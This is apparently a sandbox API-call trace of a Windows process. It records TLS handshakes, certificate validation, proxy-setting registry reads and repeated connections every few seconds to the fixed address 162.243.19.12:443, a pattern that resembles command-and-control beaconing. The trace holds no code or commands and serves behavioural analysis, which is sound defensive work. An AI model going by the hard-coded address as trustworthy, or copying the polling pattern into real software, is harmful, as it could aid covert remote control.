	[0457.149] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b47a80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b4b878, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b4b898, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b4b898, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0457.149] recv (in: s=0x7d0, buf=0x2ad23b4b988, len=5, flags=0 | out: buf=0x2ad23b4b988*) returned 5
	[0457.149] recv (in: s=0x7d0, buf=0x2ad23b4b9ad, len=48, flags=0 | out: buf=0x2ad23b4b9ad*) returned 48
	[0457.149] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b47a80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b4bab0, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b4bad0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b4bad0, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0457.150] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3a40 | out: pvContextBuffer=0x2ad3bad3a40) returned 0x0
	[0457.150] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b4bc18 | out: pBuffer=0x2ad23b4bc18) returned 0x0
	[0457.152] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b4bc70 | out: pBuffer=0x2ad23b4bc70) returned 0x0
	[0457.152] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b4bcd8 | out: pBuffer=0x2ad23b4bcd8) returned 0x0
	[0457.152] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0457.152] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0457.152] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb055d0
	[0457.152] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0457.153] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb055d0) returned 0x0
	[0457.153] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0457.153] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0457.153] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0457.153] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb055d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0457.153] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb055d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0457.155] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0457.156] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0457.157] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0457.158] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0457.158] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0457.159] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0457.159] SetLastError (dwErrCode=0x0) 
	[0457.159] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0457.161] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0457.161] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0457.161] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b4e8e0, MessageSeqNo=0x0 | out: pMessage=0x2ad23b4e8e0) returned 0x0
	[0457.162] CoTaskMemAlloc (cb=0x20) returned 0x2ad3bac9fe0
	[0457.162] WSASend (in: s=0x7d0, lpBuffers=0x2ad3bac9fe0*=((len=0x3b, buf=0x2ad23b4bba0*), (len=0xd5, buf=0x2ad23b4e6e8*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3bac9fe0*=((len=0x3b, buf=0x2ad23b4bba0*), (len=0xd5, buf=0x2ad23b4e6e8*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0457.169] CoTaskMemFree (pv=0x2ad3bac9fe0) 
	[0457.169] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0457.169] recv (in: s=0x7d0, buf=0x2ad23b4ea88, len=5, flags=0 | out: buf=0x2ad23b4ea88*) returned 5
	[0457.652] recv (in: s=0x7d0, buf=0x2ad23b4eaad, len=1488, flags=0 | out: buf=0x2ad23b4eaad*) returned 1488
	[0457.653] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b4f190, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b4f190, pfQOP=0x0) returned 0x0
	[0457.654] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0457.654] SetEvent (hEvent=0x6b8) returned 1
	[0457.722] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0475.728] CloseHandle (hObject=0x388) returned 1
	[0476.100] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0476.101] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0476.101] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0476.101] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0476.102] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0476.102] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0476.103] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0476.104] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0476.104] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0476.104] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0476.105] GetCurrentProcess () returned 0xffffffffffffffff
	[0476.105] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0476.105] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb18580
	[0476.106] WinHttpSetTimeouts (hInternet=0x2ad3bb18580, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0476.106] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0476.124] SetEvent (hEvent=0x6b8) returned 1
	[0476.125] select (in: nfds=0, readfds=0x2ad23b64198, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b64198, writefds=0x0, exceptfds=0x0) returned 1
	[0476.125] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0476.128] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0476.130] shutdown (s=0x7d0, how=2) returned 0
	[0476.132] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0476.132] closesocket (s=0x7d0) returned 0
	[0476.133] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0476.134] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0476.134] WSAConnect (in: s=0x7d0, name=0x2ad23b65930*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0476.254] closesocket (s=0x9d4) returned 0
	[0476.259] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b628d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b661b8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b661b8, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0476.260] FreeContextBuffer (in: pvContextBuffer=0x2ad3badfc30 | out: pvContextBuffer=0x2ad3badfc30) returned 0x0
	[0476.260] send (in: s=0x7d0, buf=0x2ad23b66288*, len=333, flags=0 | out: buf=0x2ad23b66288*) returned 333
	[0476.261] recv (in: s=0x7d0, buf=0x2ad23b66288, len=5, flags=0 | out: buf=0x2ad23b66288*) returned 5
	[0476.366] recv (in: s=0x7d0, buf=0x2ad23b6628d, len=49, flags=0 | out: buf=0x2ad23b6628d*) returned 49
	[0476.366] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b628d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b664c8, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b664e8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b664e8, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0476.366] recv (in: s=0x7d0, buf=0x2ad23b665d8, len=5, flags=0 | out: buf=0x2ad23b665d8*) returned 5
	[0476.366] recv (in: s=0x7d0, buf=0x2ad23b665fd, len=1, flags=0 | out: buf=0x2ad23b665fd*) returned 1
	[0476.366] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b628d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b666d0, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b666f0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b666f0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0476.367] recv (in: s=0x7d0, buf=0x2ad23b667e0, len=5, flags=0 | out: buf=0x2ad23b667e0*) returned 5
	[0476.367] recv (in: s=0x7d0, buf=0x2ad23b66805, len=48, flags=0 | out: buf=0x2ad23b66805*) returned 48
	[0476.367] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b628d8, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b66908, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b66928, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b66928, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0476.370] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3bc0 | out: pvContextBuffer=0x2ad3bad3bc0) returned 0x0
	[0476.370] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b66a70 | out: pBuffer=0x2ad23b66a70) returned 0x0
	[0476.370] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b66ac8 | out: pBuffer=0x2ad23b66ac8) returned 0x0
	[0476.371] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b66b30 | out: pBuffer=0x2ad23b66b30) returned 0x0
	[0476.371] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04cd0) returned 0x2ad3bb04cd0
	[0476.372] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0476.372] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb04cd0
	[0476.372] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04cd0) returned 0x2ad3bb04cd0
	[0476.372] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb04cd0) returned 0x0
	[0476.372] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0476.373] CertFreeCertificateContext (pCertContext=0x2ad3bb04cd0) returned 1
	[0476.375] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0476.375] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb04cd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0476.375] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04cd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0476.377] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0476.379] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04cd0) returned 0x2ad3bb04cd0
	[0476.380] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0476.381] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0476.381] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0476.381] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0476.381] SetLastError (dwErrCode=0x0) 
	[0476.381] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0476.382] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0476.382] CertFreeCertificateContext (pCertContext=0x2ad3bb04cd0) returned 1
	[0476.382] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b69738, MessageSeqNo=0x0 | out: pMessage=0x2ad23b69738) returned 0x0
	[0476.382] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca640
	[0476.383] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca640*=((len=0x3b, buf=0x2ad23b669f8*), (len=0xd5, buf=0x2ad23b69540*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca640*=((len=0x3b, buf=0x2ad23b669f8*), (len=0xd5, buf=0x2ad23b69540*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0476.383] CoTaskMemFree (pv=0x2ad3baca640) 
	[0476.383] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0476.383] recv (in: s=0x7d0, buf=0x2ad23b698e0, len=5, flags=0 | out: buf=0x2ad23b698e0*) returned 5
	[0476.901] recv (in: s=0x7d0, buf=0x2ad23b69905, len=272, flags=0 | out: buf=0x2ad23b69905*) returned 272
	[0476.901] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b69b28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b69b28, pfQOP=0x0) returned 0x0
	[0476.903] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0476.903] recv (in: s=0x7d0, buf=0x2ad23b69900, len=5, flags=0 | out: buf=0x2ad23b69900*) returned 5
	[0476.904] recv (in: s=0x7d0, buf=0x2ad23b6b28d, len=1248, flags=0 | out: buf=0x2ad23b6b28d*) returned 1248
	[0476.904] DecryptMessage (in: phContext=0xd7ef71bb40, pMessage=0x2ad23b6b880, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b6b880, pfQOP=0x0) returned 0x0
	[0476.904] SetEvent (hEvent=0x6b8) returned 1
	[0476.980] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0483.988] CloseHandle (hObject=0x388) returned 1
	[0484.398] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0484.399] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0484.400] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0484.400] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0484.401] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0484.402] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0484.402] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0484.404] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0484.404] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0484.404] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0484.404] GetCurrentProcess () returned 0xffffffffffffffff
	[0484.404] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0484.405] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb19f00
	[0484.405] WinHttpSetTimeouts (hInternet=0x2ad3bb19f00, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0484.406] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0484.425] SetEvent (hEvent=0x6b8) returned 1
	[0484.426] select (in: nfds=0, readfds=0x2ad23b718f0, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b718f0, writefds=0x0, exceptfds=0x0) returned 1
	[0484.427] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0484.429] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0484.431] shutdown (s=0x7d0, how=2) returned 0
	[0484.434] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0484.434] closesocket (s=0x7d0) returned 0
	[0484.435] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0484.436] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0484.436] WSAConnect (in: s=0x7d0, name=0x2ad23b73088*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0484.544] closesocket (s=0x9d4) returned 0
	[0484.545] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b70030, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b73910, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b73910, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0484.546] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0484.546] send (in: s=0x7d0, buf=0x2ad23b739e0*, len=333, flags=0 | out: buf=0x2ad23b739e0*) returned 333
	[0484.547] recv (in: s=0x7d0, buf=0x2ad23b739e0, len=5, flags=0 | out: buf=0x2ad23b739e0*) returned 5
	[0484.652] recv (in: s=0x7d0, buf=0x2ad23b739e5, len=49, flags=0 | out: buf=0x2ad23b739e5*) returned 49
	[0484.652] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b70030, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b73c20, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b73c40, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b73c40, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0484.652] recv (in: s=0x7d0, buf=0x2ad23b73d30, len=5, flags=0 | out: buf=0x2ad23b73d30*) returned 5
	[0484.652] recv (in: s=0x7d0, buf=0x2ad23b73d55, len=1, flags=0 | out: buf=0x2ad23b73d55*) returned 1
	[0484.653] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b70030, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b73e28, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b73e48, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b73e48, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0484.653] recv (in: s=0x7d0, buf=0x2ad23b73f38, len=5, flags=0 | out: buf=0x2ad23b73f38*) returned 5
	[0484.653] recv (in: s=0x7d0, buf=0x2ad23b73f5d, len=48, flags=0 | out: buf=0x2ad23b73f5d*) returned 48
	[0484.653] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b70030, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b74060, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b74080, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b74080, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0484.655] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3920 | out: pvContextBuffer=0x2ad3bad3920) returned 0x0
	[0484.655] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b741c8 | out: pBuffer=0x2ad23b741c8) returned 0x0
	[0484.655] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b74220 | out: pBuffer=0x2ad23b74220) returned 0x0
	[0484.655] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b74288 | out: pBuffer=0x2ad23b74288) returned 0x0
	[0484.655] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0484.656] CertDuplicateStore (hCertStore=0x2ad3bad10c0) returned 0x2ad3bad10c0
	[0484.656] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x0) returned 0x2ad3bb055d0
	[0484.656] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0484.656] CertEnumCertificatesInStore (hCertStore=0x2ad3bad10c0, pPrevCertContext=0x2ad3bb055d0) returned 0x0
	[0484.656] CertCloseStore (hCertStore=0x2ad3bad10c0, dwFlags=0x0) returned 1
	[0484.656] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0484.659] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad22c7b2a0
	[0484.659] CertAddCRLLinkToStore (in: hCertStore=0x2ad22c7b2a0, pCrlContext=0x2ad3bb055d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0484.659] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb055d0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad22c7b2a0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0484.661] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0484.663] CertDuplicateCertificateContext (pCertContext=0x2ad3bb055d0) returned 0x2ad3bb055d0
	[0484.663] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0484.695] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0484.696] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0484.696] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0484.696] SetLastError (dwErrCode=0x0) 
